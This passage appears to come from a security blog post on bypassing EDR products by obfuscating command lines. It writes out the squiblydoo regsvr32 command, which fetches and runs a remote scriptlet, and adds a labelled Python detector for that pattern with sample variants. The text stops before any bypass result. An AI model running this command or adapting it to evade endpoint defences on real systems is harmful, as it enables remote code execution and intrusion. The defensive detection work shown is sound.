Antivirus has been developed over two decades, and as the threat landscape changed it became harder and harder for traditional signature-based solutions to keep up with the growing number of threats. Somewhere around 2013 the next generation of endpoint protection platform was coined: Endpoint Detection & Response (EDR). Most EDR solutions mostly don't rely on signature databases to detect malware and suspicious activity (we did say mostly... to a degree they still do); instead they use a combination of static machine-learning analysis and dynamic behavioural analysis to detect threats and protect endpoint systems.
There are a lot of EDR solutions on the market; below is just a small list of the ones we have played with and done some research on:
EDR solutions in general are great (mostly): detecting suspicious behaviour, blocking a process the moment its threat score hits a certain threshold, stopping that ransomware in its tracks. EDRs are not perfect, but they do a pretty great job (mostly) when deployed and managed correctly. We won't be going into any details on how they run, collect telemetry, etc.; you can find some really great write-ups from the vendors themselves and from other researchers.
There is a fair number of smart people playing in the EDR security research space, but in short summary a lot of the attacks focus around hooking, unhooking, patching, avoiding NTDLL.dll, and avoiding pretty much all APIs with direct syscalls. You can find some more details summarised here:
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
Sifting through the telemetry collected from various EDR consoles (EDR collects a lot) and analysing the data on our detected activity got us thinking about obfuscating the command line, to see whether we could bypass some of the detections that kept getting flagged on Windows endpoints in the EDR consoles. So we looked into a few different ways to obfuscate commands executed from the command line, and at ways to obfuscate known malicious commands.
We decided on a commonly used, well-known and widely blocked command-line attack known as squiblydoo (MITRE ATT&CK T1218.010):
regsvr32.exe /s /u /i:https://www.attackify.com/test.sct scrobj.dll
And you will find that, generally, antivirus and EDRs are pretty good at catching this sort of thing:
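As an added example (not code from the original post), here is the kind of defender-side check that makes a squiblydoo detection robust to cosmetic command-line variation: the command line is normalised (case, quoting, whitespace, `-` versus `/` switch prefix) before matching the regsvr32 pattern shown above. The sample command lines are constructed, and the function names are my own.

```python
import re

# Constructed sample command lines (not from the original post): the squiblydoo
# command from the page, two cosmetically varied copies, and two benign-looking
# regsvr32 invocations that should not match the remote-scriptlet rule.
SAMPLE_COMMAND_LINES = [
    r'regsvr32.exe /s /u /i:https://www.attackify.com/test.sct scrobj.dll',
    r'"C:\Windows\System32\REGSVR32.EXE"  -S  -U  -I:HTTPS://www.attackify.com/test.sct  ScrObj.DLL',
    r'regsvr32 /s /i:http://www.attackify.com/test.sct scrobj.dll',
    r'regsvr32.exe /s "C:\Program Files\Vendor\driver.dll"',
    r'regsvr32.exe /s /i:C:\Temp\config.sct scrobj.dll',
]

# A token is either a double-quoted run (spaces allowed) or a run of non-space.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def normalise_tokens(cmdline):
    """Split a Windows command line into lowercase tokens with surrounding
    quotes removed, whitespace collapsed and '-' switches rewritten as '/'."""
    tokens = []
    for tok in _TOKEN_RE.findall(cmdline):
        tok = tok.strip('"').lower()
        if tok.startswith('-'):
            tok = '/' + tok[1:]
        tokens.append(tok)
    return tokens


def _basename(token):
    """Last path component, so 'c:\\windows\\system32\\regsvr32.exe' -> 'regsvr32.exe'."""
    return token.rsplit('\\', 1)[-1]


def is_squiblydoo(cmdline):
    """True when the command line is regsvr32 loading scrobj.dll with an /i:
    argument that points at a remote (http/https) scriptlet, i.e. the
    T1218.010 pattern from the page, regardless of case, quoting or prefix."""
    toks = normalise_tokens(cmdline)
    if not toks or _basename(toks[0]) not in ('regsvr32', 'regsvr32.exe'):
        return False
    remote_install = any(
        t.startswith('/i:') and t[3:].startswith(('http://', 'https://'))
        for t in toks[1:])
    uses_scrobj = any(_basename(t) == 'scrobj.dll' for t in toks[1:])
    return remote_install and uses_scrobj


def scan(cmdlines):
    """Return the subset of command lines that match the rule."""
    return [c for c in cmdlines if is_squiblydoo(c)]


if __name__ == '__main__':
    for hit in scan(SAMPLE_COMMAND_LINES):
        print('FLAGGED:', hit)
```

The local-scriptlet case (`/i:C:\Temp\config.sct`) is deliberately left unflagged here to keep to the page's remote-URL pattern; a stricter rule would also alert on any `.sct` passed to `/i:`.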
After trying a number of different variations and ideas, something interesting eventually